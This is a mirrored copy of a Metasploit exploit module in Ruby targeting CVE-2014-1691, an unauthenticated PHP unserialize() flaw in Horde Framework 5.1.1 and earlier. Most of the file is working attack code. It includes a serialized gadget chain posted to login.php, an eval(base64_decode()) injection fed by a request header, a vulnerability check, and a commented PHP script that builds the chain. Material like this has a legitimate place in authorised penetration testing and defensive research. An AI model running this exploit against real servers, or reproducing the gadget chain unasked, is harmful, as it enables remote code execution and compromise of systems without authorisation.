Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/horde_unserialize_exec.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Horde Framework Unserialize PHP Code Execution',

16
        'Description' => %q{

17
          This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be

18
          abused to allow unauthenticated users to execute arbitrary code with the permissions of

19
          the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.

20
          The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean

21
          class to reach a dangerous call_user_func() call in the Horde_Prefs class.

22
        },

23
        'Author' => [

24
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)

25
          'juan vazquez' # Metasploit module

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'CVE', '2014-1691' ],

30
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],

31
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],

32
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]

33
        ],

34
        'Privileged' => false,

35
        'Platform' => ['php'],

36
        'Arch' => ARCH_PHP,

37
        'Payload' => {

38
          'DisableNops' => true

39
        },

40
        'Targets' => [ ['Horde 5', {}], ],

41
        'DefaultTarget' => 0,

42
        'DisclosureDate' => '2013-06-27',

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])

54
      ]

55
    )

56
  end

57


58
  def check

59
    flag = rand_text_alpha(rand(10) + 20)

60
    res = send_request_exploit("print #{flag};die;")

61
    if res and res.body and res.body.to_s =~ /#{flag}/

62
      return Exploit::CheckCode::Vulnerable

63
    end

64


65
    return Exploit::CheckCode::Safe

66
  end

67


68
  def exploit

69
    print_status("Testing injection...")

70
    unless check == Exploit::CheckCode::Vulnerable

71
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")

72
    end

73


74
    print_status("Exploiting the unserialize()...")

75
    send_request_exploit(payload.encoded)

76
  end

77


78
  def send_request_exploit(p)

79
    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"

80


81
    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"

82
    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"

83
    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"

84
    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"

85
    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"

86


87
    send_request_cgi(

88
      {

89
        'uri' => normalize_uri(target_uri.path.to_s, "login.php"),

90
        'method' => 'POST',

91
        'vars_post' => {

92
          '_formvars' => payload_serialized

93
        },

94
        'headers' => {

95
          'Cmd' => Rex::Text.encode_base64(p)

96
        }

97
      }

98
    )

99
  end

100
end

101


102
=begin

103


104
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection

105


106
class Horde_Config

107
{

108
   protected $_oldConfig = "phpinfo();die;";

109
}

110


111
class Horde_Prefs_Scope

112
{

113
   protected $_prefs = array(1);

114
}

115


116
class Horde_Prefs

117
{

118
   protected $_opts, $_scopes;

119


120
   function __construct()

121
   {

122
      $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');

123
      $this->_scopes['horde'] = new Horde_Prefs_Scope;

124
   }

125
}

126


127
class Horde_Prefs_Identity

128
{

129
   protected $_prefs, $_prefnames;

130


131
   function __construct()

132
   {

133
      $this->_prefs = new Horde_Prefs;

134
      $this->_prefnames['identities'] = 0;

135
   }

136
}

137


138
class Horde_Kolab_Server_Decorator_Clean

139
{

140
   private $_server, $_added = array(1);

141


142
   function __construct()

143
   {

144
      $this->_server = new Horde_Prefs_Identity;

145
   }

146
}

147


148
$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);

149


150
=end

151


152